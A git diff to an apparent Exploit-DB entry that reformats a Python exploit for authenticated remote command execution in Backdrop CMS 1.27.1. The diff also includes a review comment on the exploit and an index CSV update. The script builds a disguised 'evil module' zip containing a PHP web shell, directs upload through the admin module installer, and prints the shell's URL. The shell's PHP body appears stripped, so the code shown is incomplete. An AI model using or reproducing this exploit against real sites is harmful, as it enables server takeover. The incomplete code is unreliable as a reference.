diff --git a/exploits/php/webapps/52021.py b/exploits/php/webapps/52021.py index 4770b5099..8cf7609f0 100755 --- a/exploits/php/webapps/52021.py +++ b/exploits/php/webapps/52021.py @@ -1,4 +1,4 @@ -# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE) +# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) # Date: 04/27/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ @@ -10,88 +10,83 @@ import os import time import zipfile - - def create_files(): -info_content = """ -type = module -name = Block -description = Controls the visual building blocks a page is constructed -with. Blocks are boxes of content rendered into an area, or region, of a -web page. -package = Layouts -tags[] = Blocks -tags[] = Site Architecture -version = BACKDROP_VERSION -backdrop = 1.x + info_content = """ + type = module + name = Block + description = Controls the visual building blocks a page is constructed + with. Blocks are boxes of content rendered into an area, or region, of a + web page. + package = Layouts + tags[] = Blocks + tags[] = Site Architecture + version = BACKDROP_VERSION + backdrop = 1.x -configure = admin/structure/block + configure = admin/structure/block -; Added by Backdrop CMS packaging script on 2024-03-07 -project = backdrop -version = 1.27.1 -timestamp = 1709862662 -""" -shell_info_path = "shell/shell.info" -os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü -oluşturur -with open(shell_info_path, "w") as file: -file.write(info_content) + ; Added by Backdrop CMS packaging script on 2024-03-07 + project = backdrop + version = 1.27.1 + timestamp = 1709862662 + """ + shell_info_path = "shell/shell.info" + os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur + with open(shell_info_path, "w") as file: + file.write(info_content) -shell_content = """ - -
- -- -- - -""" -shell_php_path = "shell/shell.php" -with open(shell_php_path, "w") as file: -file.write(shell_content) - -return shell_info_path, shell_php_path + shell_content = """ + + + +
+ ++ + + """ + shell_php_path = "shell/shell.php" + with open(shell_php_path, "w") as file: + file.write(shell_content) + return shell_info_path, shell_php_path def create_zip(info_path, php_path): -zip_filename = "shell.zip" -with zipfile.ZipFile(zip_filename, 'w') as zipf: -# Dosyaları shell klasörü altında sakla -zipf.write(info_path, arcname='shell/shell.info') -zipf.write(php_path, arcname='shell/shell.php') -return zip_filename + zip_filename = "shell.zip" + with zipfile.ZipFile(zip_filename, 'w') as zipf: + zipf.write(info_path, arcname='shell/shell.info') + zipf.write(php_path, arcname='shell/shell.php') + return zip_filename def main(url): -print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") -time.sleep(3) + print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") + time.sleep(3) -print("Evil module generating...") -time.sleep(2) + print("Evil module generating...") + time.sleep(2) -info_path, php_path = create_files() -zip_filename = create_zip(info_path, php_path) + info_path, php_path = create_files() + zip_filename = create_zip(info_path, php_path) -print("Evil module generated!", zip_filename) -time.sleep(2) + print("Evil module generated!", zip_filename) + time.sleep(2) -print("Go to " + url + "/admin/modules/install and upload the " + -zip_filename + " for Manual Installation.") -time.sleep(2) + print("Go to " + url + "/admin/modules/install and upload the " + + zip_filename + " for Manual Installation.") + time.sleep(2) -print("Your shell address:", url + "/modules/shell/shell.php") + print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": -import sys -if len(sys.argv) < 2: -print("Usage: python script.py [url]") -else: -main(sys.argv[1]) \ No newline at end of file + import sys + if len(sys.argv) < 2: + print("Usage: python script.py [url]") + else: + main(sys.argv[1]) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 94b9d8aee..342d20cb5 100644 
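Review bot: The retitle to "Authenticated" in the file header is not carried into the script body: the banner printed at the top of `main` still reads `Backdrop CMS 1.27.1 - Remote Command Execution Exploit`, and nothing in the file states which privilege is required. The printed instructions depend on access to `/admin/modules/install`, so the precondition appears to be an account allowed to install modules manually. A header line such as `# Requires: authenticated account with permission to install modules (admin/modules/install)` would let readers triage this as post-authentication abuse of the module installer rather than a pre-auth flaw. The re-joined comment on the `os.makedirs` line now reads `# Klasörüoluşturur` with the two words fused; `# create the shell/ directory` would be clearer. For defenders, the artifact the script describes is a manually installed module directory under `/modules/` that contains a `.php` file next to its `.info` file, which is worth checking for on sites where manual installation is enabled.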
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
-52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,,
+52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info